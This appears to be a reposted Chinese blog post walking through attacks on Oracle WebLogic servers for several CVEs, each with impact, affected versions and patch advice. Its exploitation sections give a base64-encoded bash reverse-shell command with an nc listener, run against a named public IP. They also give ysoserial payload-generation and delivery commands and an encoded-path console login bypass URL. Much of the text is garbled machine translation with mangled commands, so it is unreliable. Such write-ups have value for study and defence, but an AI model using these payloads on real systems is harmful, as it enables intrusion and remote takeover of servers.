weblogic攻击,weblogic漏扫
所有文章仅供安全研究和学习,风险自担!
weblogic、WebLogic反序列化(CVE-2020-2883)0x01漏洞描述0x02影响范围0x03漏洞利用0x04漏洞修复二、Weblogic远程代码执行(CVE-2018-3245)0x01漏洞描述0x02影响范围0x03漏洞利用0x04漏洞修复4.1官方升级4.2其他解决方案三、Weblogic特权绕过漏洞(CVE-2020-14750)0x01漏洞描述0x02影响范围0x03漏洞利用0x04漏洞修复四、 Weblogic反序列化(CVE-2020-2551)0x01漏洞描述0x02范围0x03漏洞修复0x04 weblogic反序列化(CVE-2020-2883)重现weblogic远程代码执行(CVE-2020-14882)weblogic远程代码执行(C VE-2019-2725)weblogic反序列化(CVE-2019-2729)重现WebLogic反序列化(CVE-2018-2628)漏洞重现
#前言Oracle融合中间件(Oracle Fusion Middleware)是一套面向甲骨文企业和云环境的业务创新平台。平台提供中间件、软件集合等功能。Oracle WebLogic Server是适用于云环境和传统环境的应用服务器组件之一。漏洞
CVE-2019-2725
CVE-2019-2729
CVE-2018-3191
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
CVE-2017-3506
CVE-2017-10271
CVE-2017-3248
CVE-2016-0638
CVE-2016-3510
CVE-2015-4852
CVE-2014-4210
SSRF控制台弱命令,部署webshell
CVE-2019-2729频繁出现。
一、weblogic反序列化(CVE-2020-2883)0x01漏洞描述在Oracle官方发布的2020年4月CPU(关键补丁更新)关键补丁中,有两个是针对WebLogic Server的,CVS3.0是严重漏洞(CVE-2020-2883,CVE-2020-2884),分值为9.8,允许未经认证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server。成功利用该漏洞可导致攻击者接管WebLogic Server,从而远程执行代码。
0x02影响范围Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
0x03利用端口7001
(1)访问/console目录
Ip:端口/控制台
自动跳转到
http://118 . 193 . 36 . 37:50128/console/log in/loginform . JSP
成功确认weblogic无人机。
(2)反弹壳
攻击机监控
nc -lvvp端口端口使用脚本反弹外壳。
外壳需要通过网站编码。
外壳编码
Python3执行
python CVE _ 2020 _ 2883 _ exp . py-u http://118 . 193 . 36 . 37:50128/-c bash-c { echo,YmFzaCAtaSA jiavzgv 2 L3 rjcc 8 xmtkumjkunjcunc 85 odk 3ida JjE=} { base64,-d}{bash,-i}
弹壳成功。
检查标志
0x04漏洞修复1。官方修复方案
Oracle已发布修补程序来修复上述漏洞。请参考官方公告及时下载受影响产品的补丁,并参考补丁安装包中的自述文件进行安装更新,确保长期有效防护。
注意:Oracle官方补丁要求用户持有正版软件的授权帐户。登录https://support.oracle.com后,他们可以下载最新的补丁。
2.临时解决方案
用户可以通过控制T3协议的访问来暂时阻止针对这些漏洞的攻击。该方法如下:
进入WebLogic控制台,在base_domain的配置页面,进入“安全”选项卡页面,点击“过滤”进入连接过滤配置。
在连接过滤器中输入:WebLogic . security . net . connectionfilterimpl,参考下面的编写方法,在连接过滤器规则中配置符合企业实际情况的规则:
27.0.0.1 * *允许t3 t3s本地IP * *允许t3t3s允许访问IP * *允许t3t3s * *拒绝t3t3s。如果规则保存后没有生效,建议重启WebLogic服务(重启WebLogic服务会造成业务中断,建议相关人员评估风险后再操作)。
二。Weblogic远程代码执行(CVE-2018-3245)0x01漏洞描述:WebLogic是美国甲骨文公司生产的应用服务器。它是一个基于JAVAEE架构的中间件。WebLogic是一个Java应用服务器,用于开发、集成、部署和管理大规模分布式web应用、网络应用和数据库应用。该漏洞可以通过利用RMI机制的缺陷来执行任意反序列化代码。攻击者可以在未经授权的情况下将有效载荷封装在T3协议中,通过反序列化T3协议中的有效载荷,攻击者可以远程攻击易受攻击的WebLogic组件,执行任意代码并获得目标系统的所有权限。
在weblogic中,攻击者利用其他rmi绕过weblogic黑名单的限制,然后用readObject解析加载的内容,造成反序列化远程代码执行的漏洞。该漏洞主要由T3服务触发。WebLogic console 7001所有开放的端口都会默认开放T3服务,攻击者可以通过发送构造的T3协议数据获得目标服务器的权限。
0x02影响范围Weblogic 10.3.6.0
Weblogic 12.1.3.0
WebLogic 12.2.1.3
0x03利用https://github.com/ianxtianxt/CVE-2018-3245
第一步
Java-jar yso serial-CVE-2018-3245 . jar
为什么这么连环?
用法:Java-jar ysos erial-CVE-2018-3245 . jar[有效负载][命令]
可用有效负载类型:
有效负载作者依赖关系
- - -
CVE _ 2018 _ 2893 _ 1 @姆贝希勒
CVE _ 2018 _ 2893 _ 2 @姆贝希勒
CVE _ 2018 _ 2893 _ 3 @姆贝希勒
CVE_2018_3245 @mbechler
JRMPClient @mbechler
Jdk7u21 @frohoff
第二步
Java-jar ysos erial-CVE-2018-3245 . jar CVE _ 2018 _ 3245 "[RMI _ SERVICE _ IP]:[PORT]" POC 5 . ser
第三步
python WebLogic . py[目标主机][端口] poc5。
0x04漏洞修复4.1正式升级Oracle官方在本次关键补丁更新(CPU)中修复了该漏洞。请参考官方通知3359 www.oracle.com/technetwork/security-advisory/CPU Oct2018-4428296.html #附录FW,或绿色联盟技术安全预警微信微信官方账号文章《Oracle全系产品2018年10月关键补丁更新(CPU)》的附录部分,及时下载受影响的产品更新补丁,并参考补丁安装包中的自述文件进行安装更新,确保长期有效防护。
注意:Oracle官方补丁要求用户持有正版软件的授权帐户。登录https://support.oracle.com后,他们可以下载最新的补丁。
4.2其他解决方案由于Weblogic使用黑名单来防止恶意反序列化,所以此次发布的补丁仍有可能被绕过。最新版本的jdk引入了JEP290增强的安全机制,防止java反序列化导致的任意代码执行。使用weblogic的用户可以通过将jdk升级到最新版本来保护此漏洞。
Jdk版本升级建议:
1.8版升级到8u121或以上。
1.7版升级到7u131或更高版本。
1.6版升级到6u141或更高版本。
三。WebLogic特权绕过漏洞(CVE-2020-14750)0x01漏洞描述Oracle融合中间件(Oracle Fusion Middleware)是一套面向甲骨文企业和云环境的业务创新平台。平台提供中间件、软件集合等功能。
Oracle WebLogic Server Oracle Fusion Middleware Console的多个版本中存在一个安全漏洞,可绕过CVE-2020-14882修补程序。远程攻击者可以构建一个特殊的HTTP请求,并在未经身份验证的情况下接管WebLogic Server控制台,从而执行任意代码。
CVE-2020-14750是WebLogic控制台授权验证绕过的漏洞。CVE-2020-14882补丁绕过漏洞,CVSS 9.8分。绕过CVE-2020-14882补丁后,攻击者可以再次绕过控制台Console的权限检查,访问原本需要登录的资源和界面功能。虽然后台任意代码执行漏洞CVE-2020-14883已经修复,但攻击者仍然可以找到其他合适的后台接口,在目标服务器上执行任意恶意代码,并获得系统权限。
0x02势力范围Oracle:Weblogic:
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
0x03漏洞观察正常成功登录页面的URL(默认账号密码weblogic/weblogic)
http://127 . 0 . 0 . 1:7001/console/console . portal?_ nfpb=true _ page label=home page 1构造URL以绕过登录
3358127 . 0 . 0 . 1:7001/控制台/图像/%2E。/console.portal此处的% 2e是。辅助url编码
成功绕过登录:
0x04漏洞修复下载官方补丁修复。
四。weblogic IIOP反序列化(CVE-2020-2551)0x01漏洞描述IIOP:IIOP是CORBA的通信协议。它定义了如何通过CORBA客户机和服务器之间的连接发送比特。
说明:Oracle融合中间件(Oracle Fusion Middleware)是一套面向甲骨文企业和云环境的业务创新平台。平台提供中间件、软件集合等功能。WebLogic Server是适用于云环境和传统环境的应用服务器组件之一。该漏洞在原理上类似于RMI反序列化漏洞(CVE-2017-3241),也类似于之前T3协议导致的一系列反序列化漏洞,都是由于调用远程对象的实现存在缺陷,使得序列化的对象可以在没有安全检查的情况下任意构造。
受WebLogic反序列化漏洞影响的协议是IIOP协议。此漏洞是由于调用远程对象的实现中的缺陷造成的,该缺陷导致序列化对象的任意构造。在使用前不进行安全检查的情况下,攻击者可以通过IIOP协议远程访问Weblogic Server上的远程接口,导入恶意数据,从而获得服务器权限,并在未经授权的情况下远程执行任意代码。
0x02影响范围
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
0x03利用0x04利用修复weblogic反序列化(CVE-2020-2883)以重现https://blog.csdn.net/YouthBelief/article/details/121133195
https://blog.csdn.net/YouthBelief/article/details/121132932 WebLogic远程代码执行(CVE-2020-14882)
https://blog.csdn.net/YouthBelief/article/details/121119954 WebLogic远程代码执行(CVE-2019-2725)
Weblogic反序列化(CVE-2019-2729)重现https://blog.csdn.net/YouthBelief/article/details/121115028
https://blog.csdn.net/YouthBelief/article/details/121091060 WebLogic反序列化(CVE-2018-2628)漏洞重现
https://blog.csdn.net/YouthBelief/article/details/121102189 WebLogic远程代码执行(CVE-2018-3245)
Weblogic远程代码执行(CVE-2018-2893)重现https://blog.csdn.net/YouthBelief/article/details/121096673
https://blog.csdn.net/YouthBelief/article/details/121090668 WLS-wsat组件远程命令执行(CVE-2017-3506)
https://blog.csdn.net/YouthBelief/article/details/121088780的Weblogic反序列化(CVE-2017-10271)
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。